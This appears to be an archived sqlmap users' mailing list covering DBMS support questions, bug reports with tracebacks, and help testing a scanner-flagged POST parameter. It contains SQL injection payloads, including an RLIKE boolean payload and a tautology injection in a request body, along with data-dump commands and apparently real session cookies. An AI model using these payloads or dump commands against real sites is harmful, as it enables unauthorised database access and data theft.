\_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\ WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\ AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_

I suspect that PAYLOAD_DELIMITER was intended to be replaced before being sent?

Also, what's with all the %5C? There is also a strange thing in this request "RLIKE", which I suppose should be "OR LIKE" ?

sqlmap/1.0-dev-28529a9 |
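The capture in the message above can be checked mechanically. The following is an added example (not from the post and not sqlmap's own code) that percent-decodes the fragment, strips the backslash escapes, and reports whether the `__PAYLOAD_DELIMITER__` marker survived into the request; `inspect_fragment` and its report keys are names made up for this illustration, and the captured string is the one quoted in the post.

```python
import re
from urllib.parse import unquote

# Request fragment exactly as quoted in the message above.
CAPTURED = (
    "%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29"
    "%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371"
    "%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28"
    "%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22"
    "%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_"
)

# Marker text as it reads once the backslash escapes are removed
# (derived from the "Decoded:" text in the post).
MARKER = "__PAYLOAD_DELIMITER__"


def inspect_fragment(raw):
    """Decode a captured request fragment and report escaping anomalies.

    Hypothetical helper for this illustration; returns a dict so the
    individual findings can be asserted on or logged.
    """
    # Step 1: undo the URL (percent) encoding. %5C becomes a backslash.
    decoded = unquote(raw)

    # Step 2: collect every backslash escape (a backslash plus one character).
    escapes = re.findall(r"\\(.)", decoded)

    # The fragment is "over-escaped" when escapes exist and no character
    # other than letters, digits and the backslash itself appears without
    # a backslash directly in front of it.
    bare_special = re.search(r"(?<!\\)[^A-Za-z0-9\\]", decoded)
    over_escaped = bool(escapes) and bare_special is None

    # Step 3: remove the escapes to recover the text that was escaped.
    unescaped = re.sub(r"\\(.)", r"\1", decoded)

    # Step 4: look for the placeholder marker before and after unescaping.
    parts = unescaped.split(MARKER)
    payload = parts[1] if len(parts) >= 3 else None

    # Step 5: decode 0x... literals so their text values are visible.
    hex_literals = [
        bytes.fromhex(h).decode("latin-1")
        for h in re.findall(r"\b0x((?:[0-9A-Fa-f]{2})+)\b", unescaped)
    ]

    return {
        "decoded": decoded,
        "unescaped": unescaped,
        "backslash_escapes": len(escapes),
        "over_escaped": over_escaped,
        "literal_marker_hits": decoded.count(MARKER),
        "marker_hits_after_unescape": unescaped.count(MARKER),
        "payload": payload,
        "hex_literals": hex_literals,
    }


if __name__ == "__main__":
    report = inspect_fragment(CAPTURED)
    for key in ("backslash_escapes", "over_escaped", "literal_marker_hits",
                "marker_hits_after_unescape", "payload", "hex_literals"):
        print("%-28s %r" % (key, report[key]))
```

A literal search for the marker in the percent-decoded text finds nothing because each underscore is backslash-escaped, so traffic or log searches for it need the unescape step first. RLIKE in the decoded text is a MySQL operator, a synonym for REGEXP.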
From: Brandon P. <bpe...@gm...> - 2013-10-23 13:06:05
|
There are no errors and it is a time based injection, so not much to go on in terms of page content. I have no issues enumerating tables or bruteforcing columns. Will test out the -f --banner args tonight. Good to hear it should be supported well.

Sent from a computer

> On Oct 23, 2013, at 0:56, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi Brandon.
>
> HSQLDB should be considered as (fully) supported by sqlmap. Nevertheless, there is always a space for improvements.
>
> You won't be able to run shell commands nor read OS files with it as it is a very constrained DBMS (Java based).
>
> As of a problem with enumerating column names. Do you get any error message with --parse-errors or are there any messages inside the page response (you can use -t traffic.txt for this) when it is being done?
>
> Do you get any information with -f --banner?
>
> Kind regards,
> Miroslav Stampar
>
>> On Oct 22, 2013 11:17 PM, "Brandon Perry" <bpe...@gm...> wrote:
>> How supported would we consider hsqldb? Not sure of its limitations, but I seem to have trouble enumerating columns with it.
>>
>> Also, --os-shell and --file-read report that hsqldb doesn't support either. Very possible, but I want to ensure it is because of technical limitations with hsqldb and not with partial support on the sqlmap side. If it is the latter, I am in a good spot to help better the support.
>>
>> Sent from a computer |
From: Miroslav S. <mir...@gm...> - 2013-10-23 05:56:33
|
Hi Brandon.

HSQLDB should be considered as (fully) supported by sqlmap. Nevertheless, there is always a space for improvements.

You won't be able to run shell commands nor read OS files with it as it is a very constrained DBMS (Java based).

As of a problem with enumerating column names. Do you get any error message with --parse-errors or are there any messages inside the page response (you can use -t traffic.txt for this) when it is being done?

Do you get any information with -f --banner?

Kind regards,
Miroslav Stampar

On Oct 22, 2013 11:17 PM, "Brandon Perry" <bpe...@gm...> wrote:
> How supported would we consider hsqldb? Not sure of its limitations, but I
> seem to have trouble enumerating columns with it.
>
> Also, --os-shell and --file-read report that hsqldb doesn't support either.
> Very possible, but I want to ensure it is because of technical limitations
> with hsqldb and not with partial support on the sqlmap side. If it is the
> latter, I am in a good spot to help better the support.
>
> Sent from a computer |
From: Brandon P. <bpe...@gm...> - 2013-10-22 21:16:45
|
How supported would we consider hsqldb? Not sure of its limitations, but I seem to have trouble enumerating columns with it.

Also, --os-shell and --file-read report that hsqldb doesn't support either. Very possible, but I want to ensure it is because of technical limitations with hsqldb and not with partial support on the sqlmap side. If it is the latter, I am in a good spot to help better the support.

Sent from a computer |
From: <in...@ex...> - 2013-10-21 22:15:56
|
I wish it were so easy. I tried with and without quotes and also specifying --dbms=Oracle
I'll clone the github version and try that in case the Kali version is somehow screwed up.

> Maybe you forgot the quotes ?
>
> python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users
>
> On Mon, Oct 21, 2013 at 8:17 PM, Miroslav Stampar <mir...@gm...> wrote:
>> Hi.
>>
>> sqlmap supports it. Sample console output:
>>
>> $ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb" -v 5 --banner
>>
>> sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover tool
>> http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 20:15:37
>>
>> [20:15:37] [DEBUG] cleaning up configuration parameters
>> [20:15:37] [DEBUG] forcing timeout to 10 seconds
>> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 established
>> [20:15:37] [INFO] the back-end DBMS is Oracle
>> [20:15:37] [INFO] fetching banner
>> [20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM v$version WHERE ROWNUM=1
>> back-end DBMS: Oracle
>> banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
>> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed
>>
>> [*] shutting down at 20:15:37
>>
>> Could you please check that you run the latest revision from the Github repository and try to run it with -v 5? Strange thing with your case is "sqlmap was not able to fingerprint..." while there is no fingerprinting in sqlmap's direct mode (at least in HEAD revision).
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Mon, Oct 21, 2013 at 7:24 PM, Brian Milliron <Br...@ec...> wrote:
>>> Using sqlmap on a recently updated Kali installation, I tried to connect
>>> to an Oracle db using this command:
>>> sqlmap -d Oracle://user:pass@10.10.10.10:1521/SID
>>> I get the error message "[CRITICAL] sqlmap was not able to fingerprint
>>> the back-end database management system. Support for this DBMS will be
>>> implemented at some point.
>>>
>>> The wiki on github states that Oracle is supported for direct
>>> connections, so there is some confusion here. Wireshark confirms no
>>> attempt to connect to the server is made at all and the syntax of the
>>> command appears correct. Can you confirm whether sqlmap currently
>>> supports direct connections to Oracle databases or if there is some
>>> other problem?
>>>
>>> --
>>> Brian Milliron, CEO
>>> ECR Security
>>> http://www.ECRSecurity.com
>>> 512-422-5408
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> Yoan AGOSTINI |
From: FAZ <jus...@ya...> - 2013-10-21 21:23:09
|
Thanks for your reply ... Test started |
From: Miroslav S. <mir...@gm...> - 2013-10-21 19:01:58
|
Hi.

I've made couple of changes this moment. Can you please retry it now?

Also, in case that it fails again I would need more information about the data itself. Thing is that we are already prepared for large table dumps but your case is kind of specific. How many columns are there in that table? What's the size of entries in those columns (>1000 chars)?

Kind regards,
Miroslav Stampar

On Sun, Oct 20, 2013 at 1:38 AM, FAZ <jus...@ya...> wrote:
> Dears,
>
> Fyi, .... I got the below error after executing the query on "big" table
> of users in my test lab.
>
> btw, it's on the latest version
>
> [16:07:17] [ERROR] thread 2:
>
> [16:07:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2ee4b81, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-2ee4b81
> Python version: 2.7.5
> Operating system: posix
> Command line: sqlmap.py -u **************************************** --exclude-sysdbs --dump --threads 10 --hex
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 95, in main
>     start()
>   File "/home/testz/sqlmap/sqlmap-dev/lib/controller/controller.py", line 582, in start
>     action()
>   File "/home/testz/sqlmap/sqlmap-dev/lib/controller/action.py", line 127, in action
>     conf.dbmsHandler.dumpTable()
>   File "/home/testz/sqlmap/sqlmap-dev/plugins/generic/entries.py", line 168, in dumpTable
>     entries = inject.getValue(query, blind=False, time=False, dump=True)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 360, in getValue
>     value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 312, in _goUnion
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/techniques/union/use.py", line 329, in unionUse
>     threadData.shared.value.extend(arrayizeValue(_[1]))
>   File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 45, in extend
>     self.append(_)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 38, in append
>     filename = self._dump(self.chunks[-1])
>   File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 65, in _dump
>     pickle.dump(value, fp)
>   File "/usr/lib/python2.7/pickle.py", line 1370, in dump
>     Pickler(file, protocol).dump(obj)
>   File "/usr/lib/python2.7/pickle.py", line 224, in dump
>     self.save(obj)
>   File "/usr/lib/python2.7/pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "/usr/lib/python2.7/pickle.py", line 600, in save_list
>     self._batch_appends(iter(obj))
>   File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
>     save(x)
>   File "/usr/lib/python2.7/pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "/usr/lib/python2.7/pickle.py", line 600, in save_list
>     self._batch_appends(iter(obj))
>   File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
>     save(x)
>   File "/usr/lib/python2.7/pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "/usr/lib/python2.7/pickle.py", line 501, in save_unicode
>     self.memoize(obj)
>   File "/usr/lib/python2.7/pickle.py", line 247, in memoize
>     self.memo[id(obj)] = memo_len, obj
> MemoryError

--
Miroslav Stampar
http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2013-10-21 18:21:06

Hi.

First thing that you have to be aware of is that web scanners like AppScan tend to give false positives here and there. You can check your sample by removing the "injection part" from the request itself.

Put this into the request.txt file:

POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Cookie: CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0; iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0; JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825; mzone_loginuid=11388868; cmjsSSOCookie= EC9...@js...; cmtokenid= EC9...@js...; CmWebtokenid=13401541844,js
Accept-Language: en-US
Referer: http://www.xxx.com/xxx/space.php?do=hot
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Content-Length: 78

return_ajax=1&act=add_attention&targetid=10086

Run in sqlmap by issuing:

python sqlmap.py -r request.txt -p return_ajax

Kind regards,
Miroslav Stampar

On Mon, Oct 21, 2013 at 5:54 PM, is2reg <is...@16...> wrote:

> method is post, but url have parameter
> following is data:
> **********************
> POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
> Content-Type: application/x-www-form-urlencoded; charset=utf-8
> Accept: text/html, */*; q=0.01
> X-Requested-With: XMLHttpRequest
> Cookie: CmProvid=js;
> WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
> CmProvid=js;
> WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
> fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0;
> iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0;
> JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825;
> mzone_loginuid=11388868;
> cmjsSSOCookie=EC9...@js...;
> cmtokenid=EC9...@js...;
> CmWebtokenid=13401541844,js
> Accept-Language: en-US
> Referer: http://www.xxx.com/xxx/space.php?do=hot
> Host: www.xxx.com
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
> Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR
> 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
> Content-Length: 78
>
> return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+&act=add_attention&targetid=10086
>
> *********************
>
> the result of appscan is blind-sql-inject, how can I inject this url with
> sqlmap?
> thanks.
>
> 2013-10-21
> ------------------------------
> is2reg

--
Miroslav Stampar
http://about.me/stamparm

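
The check described in the reply above (strip the scanner's injected part to get back the baseline request), as an added Python example that is not part of the original thread and not sqlmap code. The request is a constructed, header-trimmed copy of the one posted in the thread, and the function names are hypothetical.

```python
from urllib.parse import parse_qsl, urlencode

# Constructed sample: the scanner-modified request from the thread, cookies
# and most headers trimmed. Host and path are the thread's own placeholders.
FLAGGED_REQUEST = (
    "POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"
    "Host: www.xxx.com\r\n"
    "Content-Length: 78\r\n"
    "\r\n"
    "return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+"
    "&act=add_attention&targetid=10086"
)


def split_request(raw):
    """Split a raw HTTP request into (request line, header lines, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    return lines[0], lines[1:], body


def injected_suffix(raw, param, baseline):
    """Return the decoded text the scanner appended to `param`, or None."""
    body = split_request(raw)[2]
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name == param and value != baseline and value.startswith(baseline):
            return value[len(baseline):]
    return None


def restore_baseline(raw, param, baseline):
    """Reset `param` to `baseline` and recompute Content-Length."""
    request_line, headers, body = split_request(raw)
    pairs = parse_qsl(body, keep_blank_values=True)
    if param not in [name for name, _ in pairs]:
        raise KeyError("parameter %r not in request body" % param)
    new_body = urlencode([(n, baseline if n == param else v) for n, v in pairs])
    # Drop the stale length header; it described the scanner-modified body.
    headers = [h for h in headers if not h.lower().startswith("content-length:")]
    headers.append("Content-Length: %d" % len(new_body.encode("utf-8")))
    return "\r\n".join([request_line] + headers) + "\r\n\r\n" + new_body


if __name__ == "__main__":
    print(repr(injected_suffix(FLAGGED_REQUEST, "return_ajax", "1")))
    print(restore_baseline(FLAGGED_REQUEST, "return_ajax", "1"))
```

The 78 in the posted request is the byte length of the scanner-modified body; the restored body is 46 bytes.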
From: Yoan A. <yoa...@gm...> - 2013-10-21 18:19:36

Maybe you forgot the quotes?

python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users

On Mon, Oct 21, 2013 at 8:17 PM, Miroslav Stampar <mir...@gm...> wrote:

> Hi.
>
> sqlmap supports it. Sample console output:
>
> $ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb" -v 5 --banner
>
> sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 20:15:37
>
> [20:15:37] [DEBUG] cleaning up configuration parameters
> [20:15:37] [DEBUG] forcing timeout to 10 seconds
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 established
> [20:15:37] [INFO] the back-end DBMS is Oracle
> [20:15:37] [INFO] fetching banner
> [20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM v$version WHERE ROWNUM=1
> back-end DBMS: Oracle
> banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed
>
> [*] shutting down at 20:15:37
>
> Could you please check that you run the latest revision from the Github
> repository and try to run it with -v 5? Strange thing with your case is
> "sqlmap was not able to fingerprint..." while there is no fingerprinting in
> sqlmap's direct mode (at least in HEAD revision).
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Oct 21, 2013 at 7:24 PM, Brian Milliron <Br...@ec...> wrote:
>
>> Using sqlmap on a recently updated Kali installation, I tried to connect
>> to an Oracle db using this command:
>> sqlmap -d Oracle://user:pass@10.10.10.10:1521/SID
>> I get the error message "[CRITICAL] sqlmap was not able to fingerprint
>> the back-end database management system. Support for this DBMS will be
>> implemented at some point.
>>
>> The wiki on github states that Oracle is supported for direct
>> connections, so there is some confusion here. Wireshark confirms no
>> attempt to connect to the server is made at all and the syntax of the
>> command appears correct. Can you confirm whether sqlmap currently
>> supports direct connections to Oracle databases or if there is some
>> other problem?
>>
>> --
>> Brian Milliron, CEO
>> ECR Security
>> http://www.ECRSecurity.com
>> 512-422-5408
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
*Yoan AGOSTINI*

From: Miroslav S. <mir...@gm...> - 2013-10-21 18:17:56

Hi.

sqlmap supports it. Sample console output:

$ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb" -v 5 --banner

sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:15:37

[20:15:37] [DEBUG] cleaning up configuration parameters
[20:15:37] [DEBUG] forcing timeout to 10 seconds
[20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 established
[20:15:37] [INFO] the back-end DBMS is Oracle
[20:15:37] [INFO] fetching banner
[20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM v$version WHERE ROWNUM=1
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
[20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed

[*] shutting down at 20:15:37

Could you please check that you run the latest revision from the Github repository and try to run it with -v 5? Strange thing with your case is "sqlmap was not able to fingerprint..." while there is no fingerprinting in sqlmap's direct mode (at least in HEAD revision).

Kind regards,
Miroslav Stampar

On Mon, Oct 21, 2013 at 7:24 PM, Brian Milliron <Br...@ec...> wrote:

> Using sqlmap on a recently updated Kali installation, I tried to connect
> to an Oracle db using this command:
> sqlmap -d Oracle://user:pass@10.10.10.10:1521/SID
> I get the error message "[CRITICAL] sqlmap was not able to fingerprint
> the back-end database management system. Support for this DBMS will be
> implemented at some point.
>
> The wiki on github states that Oracle is supported for direct
> connections, so there is some confusion here. Wireshark confirms no
> attempt to connect to the server is made at all and the syntax of the
> command appears correct. Can you confirm whether sqlmap currently
> supports direct connections to Oracle databases or if there is some
> other problem?
>
> --
> Brian Milliron, CEO
> ECR Security
> http://www.ECRSecurity.com
> 512-422-5408

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2013-10-21 18:05:57

Hi.

Thank you for your report. It should be fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/8dac47f7e5d0b940c77ef77ef43713d24309ea91

On Mon, Oct 21, 2013 at 7:20 PM, warezhacking <war...@gm...> wrote:

> I've got an error on my computer(windows)
>
> Windows 7 Professional 64-bit
>
> [19:17:28] [WARNING] unknown web page charset 'x-mac-turkish'. Please
> report by e-mail to sql...@li....

--
Miroslav Stampar
http://about.me/stamparm

From: Brian M. <Br...@EC...> - 2013-10-21 17:37:13

Using sqlmap on a recently updated Kali installation, I tried to connect to an Oracle db using this command:

sqlmap -d Oracle://user:pass@10.10.10.10:1521/SID

I get the error message "[CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point."

The wiki on github states that Oracle is supported for direct connections, so there is some confusion here. Wireshark confirms no attempt to connect to the server is made at all and the syntax of the command appears correct. Can you confirm whether sqlmap currently supports direct connections to Oracle databases or if there is some other problem?

--
Brian Milliron, CEO
ECR Security
http://www.ECRSecurity.com
512-422-5408

From: warezhacking <war...@gm...> - 2013-10-21 17:20:37

I've got an error on my computer (Windows)

Windows 7 Professional 64-bit

[19:17:28] [WARNING] unknown web page charset 'x-mac-turkish'. Please report by e-mail to sql...@li....

From: is2reg<is...@16...> - 2013-10-21 15:54:30

Method is POST, but the URL has parameters. Following is the data:

**********************
POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Cookie: CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0; iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0; JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825; mzone_loginuid=11388868; cmjsSSOCookie=EC9...@js...; cmtokenid=EC9...@js...; CmWebtokenid=13401541844,js
Accept-Language: en-US
Referer: http://www.xxx.com/xxx/space.php?do=hot
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Content-Length: 78

return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+&act=add_attention&targetid=10086
*********************

The result of AppScan is blind-sql-inject. How can I inject this URL with sqlmap?
Thanks.

2013-10-21
is2reg

From: FAZ <jus...@ya...> - 2013-10-19 23:38:42

Dears,

Fyi, .... I got the below error after executing the query on "big" table of users in my test lab.

btw, it's on the latest version

[16:07:17] [ERROR] thread 2:
[16:07:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2ee4b81, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-2ee4b81
Python version: 2.7.5
Operating system: posix
Command line: sqlmap.py -u **************************************** --exclude-sysdbs --dump --threads 10 --hex
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 95, in main
    start()
  File "/home/testz/sqlmap/sqlmap-dev/lib/controller/controller.py", line 582, in start
    action()
  File "/home/testz/sqlmap/sqlmap-dev/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/home/testz/sqlmap/sqlmap-dev/plugins/generic/entries.py", line 168, in dumpTable
    entries = inject.getValue(query, blind=False, time=False, dump=True)
  File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 360, in getValue
    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
  File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 312, in _goUnion
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/home/testz/sqlmap/sqlmap-dev/lib/techniques/union/use.py", line 329, in unionUse
    threadData.shared.value.extend(arrayizeValue(_[1]))
  File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 45, in extend
    self.append(_)
  File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 38, in append
    filename = self._dump(self.chunks[-1])
  File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 65, in _dump
    pickle.dump(value, fp)
  File "/usr/lib/python2.7/pickle.py", line 1370, in dump
    Pickler(file, protocol).dump(obj)
  File "/usr/lib/python2.7/pickle.py", line 224, in dump
    self.save(obj)
  File "/usr/lib/python2.7/pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "/usr/lib/python2.7/pickle.py", line 600, in save_list
    self._batch_appends(iter(obj))
  File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
    save(x)
  File "/usr/lib/python2.7/pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "/usr/lib/python2.7/pickle.py", line 600, in save_list
    self._batch_appends(iter(obj))
  File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
    save(x)
  File "/usr/lib/python2.7/pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "/usr/lib/python2.7/pickle.py", line 501, in save_unicode
    self.memoize(obj)
  File "/usr/lib/python2.7/pickle.py", line 247, in memoize
    self.memo[id(obj)] = memo_len, obj
MemoryError

From: Miroslav S. <mir...@gm...> - 2013-10-19 18:56:05

Hi.

It should be fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/546

On Tue, Oct 15, 2013 at 7:18 PM, Miroslav Stampar <mir...@gm...> wrote:

> Hi.
>
> Sorry for the late reply. We are aware of the problem. It's the usage of
> HTML format in large dumps. We'll try to address it in next couple of days.
>
> Kind regards,
> Miroslav Stampar
>
> On Oct 11, 2013 3:04 PM, "lenny ginn" <cl...@gm...> wrote:
>
>> Hi ,
>>
>> I got the bug when i try to dump a big data here :
>> i using sqlmapproject-sqlmap-0.9-3312-g369006c.zip download at
>> https://codeload.github.com/sqlmapproject/sqlmap/legacy.zip/master
>>
>> sqlmap version: 1.0-dev
>> Python version: 2.7.5
>> Operating system: nt
>> Command line: C:\Python27\sqlmap\sqlmap.py -u
>> **********************************
>> ********************** --random-agent --threads=7 --text-only -v 3 --dump-format=html --dump-all
>> Technique: ERROR
>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>> Traceback (most recent call last):
>>   File "C:\Python27\sqlmap\sqlmap.py", line 95, in main
>>     start()
>>   File "C:\Python27\sqlmap\lib\controller\controller.py", line 582, in start
>>     action()
>>   File "C:\Python27\sqlmap\lib\controller\action.py", line 130, in action
>>     conf.dbmsHandler.dumpAll()
>>   File "C:\Python27\sqlmap\plugins\generic\entries.py", line 364, in dumpAll
>>     self.dumpTable()
>>   File "C:\Python27\sqlmap\plugins\generic\entries.py", line 323, in dumpTable
>>     conf.dumper.dbTableValues(kb.data.dumpedTable)
>>   File "C:\Python27\sqlmap\lib\core\dump.py", line 507, in dbTableValues
>>     bodyNode.appendChild(rowNode)
>>   File "C:\Python27\lib\xml\dom\minidom.py", line 125, in appendChild
>>     _append_child(self, node)
>>   File "C:\Python27\lib\xml\dom\minidom.py", line 282, in _append_child
>>     childNodes.append(node)
>> MemoryError
>>
>> [*] shutting down at 12:39:23
>>
>> Thanks you , i think problem is crash on memory setting

--
Miroslav Stampar
http://about.me/stamparm